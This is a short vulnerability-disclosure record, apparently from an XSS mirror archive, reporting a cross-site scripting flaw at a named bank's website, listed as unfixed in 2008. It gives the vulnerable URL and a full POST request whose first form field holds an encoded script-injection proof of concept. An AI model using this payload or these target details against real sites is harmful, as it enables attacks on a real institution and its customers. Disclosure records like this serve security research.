Security researcher Uber0n, has submitted on 15/01/2008 a cross-site-scripting (XSS) vulnerability affecting www.griffonbank.com, which at the time of submission ranked 617687 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 16/01/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 15/01/2008 |
Date published: 16/01/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: Uber0n |
Domain: www.griffonbank.com |
Category: XSS |
Pagerank: 617687 |
URL: http://www.griffonbank.com/netcat/add.php#error |
POST: admin_mode=0&cc=210&sub=306&catalogue=1&posting=1&f_f1=%22%3E%27%3E%3CScRiPt%3Ealert%28123%29%3C%2Fs CrIpT%3E%22%27&f_f2_day=&f_f2_month=&f_f2_year=&f_place_of_birth=&f_f3=&f_f4=&f_f5=&f_f6=&f_f7=&f_f8 =&f_f9=&f_f10=&f_f11=&f_f12=&f_f13=&f_f14=&f_f15=&f_f16_day=&f_f16_month=&f_f16_year=&f_place_of_bir th_1=&f_f17=&f_f18=&f_f19=&f_f20=&f_f21=&f_f22=&f_f23=&f_f24=&f_f25=&f_f26=&f_f27=&f_f28=&f_f29=&f_f 30_day=&f_f30_month=&f_f30_year=&f_place_of_birth_2=&f_f31=&f_f32=&f_f33=&f_f34=&f_f35=&f_f36=&f_f37 =&f_f38=&f_f39=&f_f40=&f_f41=&f_f42=&f_f47=&f_f49=&f_f50=&f_f51=&f_f52=&f_f53=&f_f54=&f_f55=&f_f56=% 28enter+amount%29&f_f57=&f_f58=&f_f59=&f_f60=&f_f61=&f_f62=&f_f63=&f_f64=&f_f65=&f_f66=&f_f67=&f_f68 =%28enter+amount%29&f_f69=&f_f70=&f_f71_day=&f_f71_month=&f_f71_year= |
Click here to view the mirror
|
|
|